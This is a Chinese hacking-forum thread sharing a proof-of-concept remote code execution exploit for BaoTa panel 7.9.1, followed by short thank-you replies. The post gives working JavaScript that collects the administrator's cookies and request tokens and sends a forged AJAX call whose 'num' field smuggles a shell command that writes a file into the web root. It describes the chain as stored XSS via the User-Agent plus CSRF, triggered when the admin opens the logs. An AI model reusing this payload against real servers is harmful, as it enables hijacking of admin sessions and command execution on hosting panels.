查看: 61434|回复: 20

宝塔前台RCE-7.9.1版本

[复制链接]
匿名
匿名  发表于 2022-7-20 12:01:30 |阅读模式
声明:漏洞信息来自于网上,仅限用于漏洞复现学习。

这个漏洞稍微有点鸡肋,首先需要web目录,比如默认的/www/wwwroot/xxx/
然后需要调用远程的js文件,web目录自己更改
[AppleScript] 纯文本查看 复制代码
//JQuery preload (optional)
(function(){
var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';
(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);
})();
// cookie
let cookies = document.cookie;
function getCookie(sKey) {
if (!sKey) { return null; }
return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" + encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=\\s*([^;]*).*$)|^.*$"), "$1")) || null;
}
all_headers = {
"Accept":"*/*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
"Connection":"close",
"Accept-Encoding":"gzip, deflate",
"dnt":"1",
"sec-gpc":"1",
"Cookie": cookies,
"x-cookie-token": getCookie('request_token'),
"Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",
"x-http-token": $('#request_token_head').attr('token'),
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"
}
$.ajax({
url: "/ajax",
type: "get",
data:
{"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE TEST'> /www/wwwroot/web目录/1.txt|"}
,
headers: all_headers,
success: function (data) {
console.info(data);
}
});


提交请求即可,修改agent头为:
游客,如果您要查看本帖隐藏内容请回复


鸡肋的地方来了,需要点击日志功能才可以触发写入文件
QQ20220720-120005@2x.png

漏洞原理:宝塔面板存在xss,通过远程调用js功能触发xss+csrf写入文件
回复

使用道具 举报

发表于 2022-7-20 12:02:15 | 显示全部楼层
刚到,抢位置
回复 支持 反对

使用道具 举报

发表于 2022-7-20 12:02:51 | 显示全部楼层
90好久没上线了
回复 支持 反对

使用道具 举报

发表于 2022-7-20 12:42:17 | 显示全部楼层
快看看
回复 支持 反对

使用道具 举报

发表于 2022-7-20 12:45:50 | 显示全部楼层
agent头是什么
回复 支持 反对

使用道具 举报

发表于 2022-7-20 13:15:23 | 显示全部楼层
来学习了
回复 支持 反对

使用道具 举报

发表于 2022-7-20 13:28:08 | 显示全部楼层
谢谢大佬分享,学习
回复 支持 反对

使用道具 举报

发表于 2022-7-24 15:19:08 | 显示全部楼层
不错,看看!
回复 支持 反对

使用道具 举报

发表于 2022-7-24 22:21:35 | 显示全部楼层
不错,看看!
回复 支持 反对

使用道具 举报

发表于 2022-7-25 14:37:20 | 显示全部楼层
学习一下
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-6 22:17 , Processed in 0.027148 second(s), 12 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部